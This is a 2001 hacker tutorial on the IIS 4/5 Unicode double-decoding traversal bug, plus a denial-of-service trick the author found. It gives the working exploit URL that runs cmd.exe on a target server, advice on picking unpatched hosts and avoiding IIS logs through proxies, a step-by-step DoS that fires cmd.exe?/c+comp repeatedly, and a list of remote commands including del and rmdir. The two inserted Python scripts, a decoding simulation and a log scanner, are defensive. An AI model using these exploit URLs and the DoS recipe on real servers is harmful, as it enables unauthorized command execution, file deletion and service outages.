Quick overview of IIS UNICODE exploit + a DOS attack

Affected Systems For IIS UNICODE EXPLOIT
----------------------------------------
All systems running the IIS 4 / IIS 5 web server:
Windows 2k
Windows 2k SP1 + SP2
Untested, but apparently NT 4 running the IIS web server

Unaffected Systems For IIS UNICODE EXPLOIT
-------------------------------------------
IIS 4.0 + NT 4 SP6/6a without any hot-fixes, according to NSFOCUS

Tested Systems For DoS
----------------------
Windows 2k,
Windows 2k SP2
I am presuming that it works on SP1, dunno about NT 4


There are patches available for the UNICODE exploit, see the links below.



Reason For Writing This
-----------------------
The UNICODE exploit has been around for a while and I thought I would have a bit of a play with it. To my surprise I found a denial of service attack, and it is far too simple to tell you here how to do it, so if you were looking for it you came to the wrong place. I wrote this tutorial so you can understand the UNICODE exploit. There are quite a few docs on the UNICODE exploit; I hope this gives you a bit more info. This is my first tutorial, I hope it makes sense... I am pretty mashed so I will try not to make too many typos.


Overview of the UNICODE exploit
-------------------------------

I haven't done extensive testing but I have noticed slightly different results occurring on Windows 2k with no service pack and SP2; dunno about SP1, sorry. It's to do with the logs, and some commands don't work, but more on that later.

The UNICODE exploit allows intruders to run arbitrary commands with the privileges of the IUSR_machinename account.

The exploit occurs because the CGI routine within the web server decodes the address twice.
You are probably going "ugh, what does that mean?". Well, I will give you the exploit and then break it into smaller parts to explain it:

http://IISserver/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

http://IISserver/ - This is the vulnerable website


/scripts/ - This directory has execute privileges on the server and is meant to be used for running CGI scripts. If this folder doesn't exist then you may need to replace it with one that does. If the site is running CGI you can find the directory by looking at the URL that gets passed. You may need to put in more ..%255c if the executable directory is in a different place. Note that not all IIS servers have an executable directory.


winnt/system32/cmd.exe - gives you a command line. You could also try running other commands like ping, netstat, traceroute... try different stuff out.

? - this separates the program from its arguments: everything after the ? is the query string, which IIS hands to the program. So for the URL above the argument is /c. If you do a cmd /? in a DOS window you get a list of the arguments you can use with cmd.exe. I know this is a bad example but if you try it out you will see what I mean. You need to use this when running various commands. For example, if you want to run route.exe you would substitute cmd.exe?/c with route.exe?PRINT. I didn't realize this until I played a bit more with various DOS commands, therefore it was not in the first draft of this tutorial.


/c+ - OK, so we know that /c is an argument for cmd.exe, so if we check the help for cmd.exe we will find out that it means "Carries out the command specified by string and then terminates". You can play about with other arguments but this one is generally needed as it kills the cmd after the command is executed. The + indicates that whatever follows it is the command. It is also used as a space between arguments.

http://IISserver/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

/..%255c..%255c - This decodes to /..\..\. What you are trying to do here is perform directory traversal. But because the IIS server checks for these things you should not be able to change directories. This is where the exploit lies. As I said earlier the address gets decoded twice, so we can get around IIS checking for such things. The first time around it decodes the address and checks it, and everything appears fine; the second time around the %255c (by now %5c) gets decoded to a \.


If you know anything about hexadecimal then you would realise that you are sending a hex value to the server. Just like %20 means space; you have all seen that before and should have probably realised what it meant. If not... you do now.

OK, so we now know that we need to send a hex value. We need to send a \, and looking at a hexadecimal (ASCII) table you will find that \ = %5c.

You might be thinking great, we can use %5c as \, but we cannot. Why? Because this is checked by IIS and it would mean that someone is trying to perform directory traversal on the server. IIS does the right thing here and denies the user access. But luckily the address gets decoded twice, so if we send the hex values of %, 5 and c we should get a \ in return after the second pass. You might need some paper to do some working out on to get it clear in your head.

So using a hex table we find that:

% = %25
5 = %35
c = %63

We do not need to send a hex value for every character of %5c... just as long as we finish up with %5c after the first decode we will be fine.
Now we know the hex values we can put them together to get the %5c as required. There are many combinations of values to put; here are a couple of examples:

Combination   Breakdown of combination                 Result
-----------   ---------------------------------------  ------
%255c         %25 = %    5 = 5      c = c              %5c
%%35c         % = %      %35 = 5    c = c              %5c
%%35%63       % = %      %35 = 5    %63 = c            %5c
%25%35%63     %25 = %    %35 = 5    %63 = c            %5c
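To make the two decoding passes concrete, here is a small Python script, added for this write-up and not part of the original tutorial, that decodes each of the combinations above once and then again, and simulates a server that checks for ..\ only after the first pass. The traversal check and the decode function are my own approximation of what the server does, not IIS code; the two paths at the bottom are the ones from the tutorial.

```python
import re
from urllib.parse import unquote

# Approximation of the server-side traversal check: reject a path in which
# "..\" or "../" is visible. The real check runs after ONE decode pass; the
# file system gets the result of the SECOND pass. (Assumed model, not IIS code.)
TRAVERSAL = re.compile(r'\.\.[\\/]')


def decode_once(s):
    """One lenient percent-decoding pass, as the server does it: a valid %XX
    becomes one character, a malformed sequence (a lone '%' or '%%') is kept."""
    return unquote(s)


def encodings_table(encodings):
    """Work the combinations table: for each encoding of a backslash, what it
    becomes after the first and after the second decode pass."""
    return {e: (decode_once(e), decode_once(decode_once(e))) for e in encodings}


def simulate_server(path):
    """What each stage of the vulnerable server sees for a requested path.
    'allowed'   - verdict of a traversal check done after the first decode.
    'traversal' - whether the path handed to the file system (second decode)
                  actually escapes the directory."""
    first = decode_once(path)
    second = decode_once(first)
    return {
        'first_decode': first,
        'second_decode': second,
        'allowed': TRAVERSAL.search(first) is None,
        'traversal': TRAVERSAL.search(second) is not None,
    }


if __name__ == '__main__':
    combos = ['%255c', '%%35c', '%%35%63', '%25%35%63']
    for enc, (once, twice) in encodings_table(combos).items():
        print(f'{enc:10} -> {once:5} -> {twice}')
    # Single encoding: the check after pass one sees "..\" and refuses it.
    # Double encoding: pass one yields "..%5c", which passes the check, and
    # pass two turns it into "..\" anyway.
    for path in ('/scripts/..%5c..%5cwinnt/system32/cmd.exe',
                 '/scripts/..%255c..%255cwinnt/system32/cmd.exe'):
        r = simulate_server(path)
        print(path)
        print('  after 1st decode:', r['first_decode'], '-> allowed' if r['allowed'] else '-> denied')
        print('  after 2nd decode:', r['second_decode'], '-> traversal' if r['traversal'] else '-> safe')
```

The fix on the server side is the one MS01-026 applies: do the traversal check on the fully decoded path, or refuse to decode a second time at all. Any check that runs before the last decode can be bypassed by one more layer of encoding, which is why all four rows of the table end up identical.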


Now you know some stuff, time to try it out
-------------------------------------------


I suggest running this in a lab and not causing havoc on the net.... I know what you script kiddies are like ...


1. Find your target.... there are around 5.9 million IIS servers around so it shouldn't be that hard to find at least one unpatched, but you should really do it in a lab. If not, try searching on Google for "IIS 5 server"; there should be one on there not patched. Searching on Google is a very lame way of finding an IIS host... try using nmap (see link later).

2. Type this into your web browser:
http://IISserver/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

You should get an output like this:

Directory of c:\

07/12/1999 13:00 356,925 TXTSETUP.SIF
07/12/1999 13:00 229,264 $LDR$
19/06/2001 01:48 Documents and Settings
19/06/2001 01:56 WINNT
19/06/2001 02:06 Program Files
19/06/2001 04:17 Inetpub
23/06/2001 04:12 Stuff
23/06/2001 22:13 New Folder
24/06/2001 20:53 MP3
25/06/2001 03:44 7 lard.txt
25/06/2001 04:06 11 poop.bat
25/06/2001 05:01 temp
25/06/2001 05:14 17 test.txt
26/06/2001 00:02 82 pooped.bat
26/06/2001 00:02 20 test1.bat
27/06/2001 02:54 test
27/06/2001 03:15 1,523 poop3.txt
28/06/2001 00:23 2,501 unicode1.txt
9 File(s) 590,350 bytes
10 Dir(s) 58,729,005,056 bytes free


By doing /c+dir+c:\+/s you will get a list of every file on the computer.... oops.
You can also ping, traceroute and other stuff....
There is a list at the bottom of this text with more commands.

Here comes a bit of a shitter
-----------------------------

Under Win2k with no service pack,
http://IISserver/scripts/..%255c..%255cwinnt/system32/route.exe+PRINT
gives the following output and no entry in the log file....

===========================================================================
Interface List
0x1 ........................... MS TCP Loopback interface
===========================================================================
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1
===========================================================================
Persistent Routes:
None



Whereas the same command under service pack 2 gives you the same results but you get logged. Whenever I say logged I mean logged by the IIS server and not by an external logging program; I doubt they will slip past those unnoticed. Trial and error comes into play quite a lot. Try out commands on your own machine first, as the chances are if you make a mistake you will get logged. The location of the logs is c:\winnt\system32\logs\W3SVC#. You cannot delete logs from the system as this requires admin rights. As I said above you only get IUSR_machinename rights; by default this account is a member of the Guests group.

Under service pack 2 you get logged for most of the commands you use, even dir. A solution is to use a proxy server to hide your IP address; I still recommend running all these tests in a lab.
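From the defending side, those log entries are what you have to work with. The following Python script is an added example, not from the original tutorial: it reads IIS W3C extended log lines of the kind written under c:\winnt\system32\logs\W3SVC#, decodes the requested path until it stops changing, and flags requests that contain a traversal, needed more than one decode pass, or invoke cmd.exe and friends. The log lines and IP addresses are constructed for the example; whether the logged cs-uri-stem keeps the encoding exactly as sent is an assumption, which is why the decode loop runs until the string is stable rather than a fixed number of times.

```python
import re
from urllib.parse import unquote

# Constructed W3C extended log sample in the layout IIS 5 uses; the field
# order is whatever the #Fields header says. IPs and times are made up.
# The author reports that the route.exe request on Win2k SP0 and the comp
# request produced no IIS log entry at all; those two lines are included
# only to show the signature, as a sensor in front of the server would see it.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-06-26 00:02:13 10.0.0.5 GET /index.htm - 200
2001-06-26 00:02:41 10.0.0.5 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir+c:\\ 200
2001-06-26 00:03:02 10.0.0.5 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\\ 404
2001-06-26 00:03:30 10.0.0.5 GET /scripts/..%255c..%255cwinnt/system32/route.exe+PRINT - 200
2001-06-26 00:03:55 10.0.0.5 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+comp 200
2001-06-26 00:04:11 10.0.0.9 GET /scripts/counter.exe - 200
"""

TRAVERSAL = re.compile(r'\.\.[\\/]')
# System binaries the tutorial runs through /scripts; no "$" anchor because
# route.exe+PRINT carries its argument inside the stem.
SYSTEM_BINARY = re.compile(r'(?:^|[\\/])(cmd|comp|route|ping|tracert|netstat)\.exe', re.I)


def fully_decode(s, max_passes=3):
    """Percent-decode until the string stops changing. Returns the final string
    and the number of passes that changed it: 2 or more means the request was
    double-encoded, which is the whole trick of the exploit."""
    passes = 0
    for _ in range(max_passes):
        d = unquote(s)
        if d == s:
            break
        s = d
        passes += 1
    return s, passes


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in #Fields."""
    fields = None
    for line in text.splitlines():
        if line.startswith('#Fields:'):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith('#') or fields is None:
            continue
        yield dict(zip(fields, line.split()))


def flag_request(rec):
    """Return the list of reasons a request looks like the exploit (empty if clean)."""
    stem, passes = fully_decode(rec['cs-uri-stem'])
    reasons = []
    if TRAVERSAL.search(stem):
        reasons.append('traversal')
    if passes > 1:
        reasons.append('double-encoded')
    if SYSTEM_BINARY.search(stem):
        reasons.append('windows binary invoked')
    # The query string is what cmd.exe runs; "+" stands for a space there.
    query = unquote(rec.get('cs-uri-query', '-')).replace('+', ' ')
    if re.search(r'(^|\s)comp(\s|$)', query):
        reasons.append('comp.exe DoS pattern')
    return reasons


def scan(text):
    """Flagged requests as (time, client ip, raw stem, status, reasons) tuples."""
    hits = []
    for rec in parse_w3c(text):
        reasons = flag_request(rec)
        if reasons:
            hits.append((rec['time'], rec['c-ip'], rec['cs-uri-stem'], rec['sc-status'], reasons))
    return hits


if __name__ == '__main__':
    for time, ip, stem, status, reasons in scan(SAMPLE_LOG):
        print(f'{time} {ip:10} {status} {stem}')
        print('    ', ', '.join(reasons))
```

Two things worth noting about the output: the 404 on the single-encoded %5c request is the server doing its job, and it is still worth flagging because it is the reconnaissance that precedes the %255c version; and the status code alone tells you nothing, since the successful double-encoded request also returns 200. Given the gaps the author describes (requests that never reach the IIS log), the patch referenced at the bottom of this text is the fix; the log review is how you find out who tried it before you applied it.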



If you try
http://IISserver/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+route PRINT you get the following:

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:

I don't know why this happens; I have tried putting another ? between route and PRINT but then I get the message saying that the system could not find route?PRINT. This means that you can only use the ? once in an address. It is trial and error seeing what commands you can execute where.



Now for what you have all been waiting for, the DoS attack
----------------------------------------------------------

I wonder how many script kiddies stopped reading this when I said above that I was not going to give you the DoS attack. It just goes to show how lame they are. If you did read this far, Mr. Script Kiddie, I know what you want so just scroll down.... you will see the command.

Knowing how easy it is to execute commands on the web server you can guess how easy this DoS attack is to implement. I was not sure whether or not to publish this info, but then I thought that there are patches out there to stop the UNICODE exploit, so why not. If someone's server goes down due to a DoS attack via the UNICODE exploit they should install all the patches and sort out their security. They are fools for not keeping an eye on current security issues. This UNICODE exploit is over a month old (at time of writing) but this DoS attack is fresh, i.e. 26/June/2k1. I have informed Microsoft and CERT of this DoS attack, giving them a link to this page. If they read down this far they will get the info on the DoS attack, but lazy employees may have given up when I said I wasn't going to give you the DoS attack. I hope they didn't but hey, who knows. I posted a link to this on Microsoft's security news server, as I couldn't find an email address to report this exploit.

I would like to point out that this is for educational purposes only and I do not condone the use of this DoS attack. Don't blame me if you get in the shit. You might like to note that you do not get logged with Win2k or Win2k SP2; dunno about Win2k SP1 but I guess if you don't get logged on SP2 you won't get logged with SP1.
Could someone please confirm that with me?

The idea of this DoS attack is to make the system have the maximum number of connections possible so no one else can access the server. When the sysadmin checks the site in the management console it will say that the web server is up. When he/she checks the site he/she will see a cached copy.... oops, everything looks fine. It appears everything is normal; this caught me a couple of times when checking to see if the DoS attack had occurred. Using IE, if you hold shift then click on refresh, the browser will download a fresh copy of the page, showing you that the server has crashed. I am hoping there are no sysadmins who are that stupid but it would not surprise me. It is probably those same sysadmins who don't patch their servers in the first place.

The only indication that some shit has gone down is when there are multiple comp.exe's in the server's Windows Task Manager and the same if not more cmd.exe's. Each comp.exe takes up approx 880Kb and each cmd.exe approx 930Kb. The cmd.exe's will die off slowly after about 3 or 4 mins until you are left with about 9 or 10 comp.exe's running along with all the other system processes. These cmd's and comp's cannot be killed off by Task Manager, and under Process Viewer you get the message "Unable to open process" when trying to kill one, so it keeps running. I have just found a way to kill the comp.exe: if you install the administrative support tools you can use the kill command to kill the comp.exe, but you can only do this while the server is not DoSed. Once the server has been DoSed you cannot kill the processes.

Hold on, hold on, we will get to what you have to type in in a second.... but first I thought you would like to know that the only way of fixing the problem is by rebooting the machine.

If you stop it in the management console and try to restart it you get the message:
Address Already in Use.

If you try restarting the World Wide Web Publishing Service you get:
Could not stop the World Wide Web Publishing Service On Local Computer
Error 1503: This service did not respond to the start or control request in a timely fashion


Follow these three simple steps
-------------------------------
1. Type the following URL into your address bar and press enter:

http://IISserver/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+comp

What we are doing here is running the comp command. This is used to compare two files, but I noticed that when you send this to a server the command stays running in the background, with no way to kill it.


2. A message at the bottom of the web browser should say something along the lines of "web site found, waiting for reply". Press stop after the message has appeared.


3. Repeat approx 15 times. You don't have to keep retyping the command; you can just use the refresh button so the URL keeps getting sent.



I have successfully DoSed the web server in 8 attempts but other times it took as many as 25; dunno why, might be the way the server was set up or hardware config or possibly previous commands. To test to see if the site has gone down, do that shift + refresh thingy that I recommended earlier.

This DoS attack may be used in other places where you have access, not only as part of the UNICODE exploit..... this is untested and just a last minute thought; if true please give credit where credit's due.


Remember all you script kiddies this is for educational purposes only.


Hope this all made sense to at least one person. If you don't understand, do a bit more reading on UNICODE and denial of service attacks. If you still don't get it give up hacking, because it ain't going to get any simpler; maybe relax and play the classic old school game Chuckie Egg, you know it makes sense. I don't think you are going to find an easier DoS attack for a while, well not until Windows XP comes out anyway :)

Well, that's the end of my first tutorial, hope you enjoyed it.



Big Poop
poop@evilweeds.com
www.evilweeds.com

Original copy found at www.evilweeds.f2s.com/hacking/unicode1.txt

Don't blame me if you get caught doing whatever, even if I told you to do it....
would you jump in front of a bus if I told you to? Well then.






more info
---------
Thanks to NSFOCUS for finding the UNICODE exploit.
NSFOCUS - http://www.nsfocus.com
CERT - http://www.cert.org/advisories/CA-2001-12.html
Cyberarmy - JOIN THEM - http://www.cyberarmy.com
Nmap - http://www.insecure.org/nmap
Patch to fix Unicode Exploit - http://www.microsoft.com/technet/security/bulletin/MS01-026.asp

Other Commands that give a response
-----------------------------------

Don't use this as a definitive guide to commands; there are definitely more.
Some may not work and some might require the full command with arguments, i.e. time /t.
Try doing these commands on your own machine first and see what gets logged. Then work from there.
Most of these commands run from the command prompt.
Also try %0d as a carriage return..... dunno to what success.

call c:\poop.bat
ren
chdir
date - privilege not required
copy
move
rmdir on 2000 / deltree on NT - dunno how to delete the files in a directory in one go
del
assoc - list some associations
ftype - change file type
path - may help list installed programs
subst - make drives with directory paths; cannot delete once made from the web browser
type - display file
ver - get OS version
vol
set
date /T
replace
time /t
verify
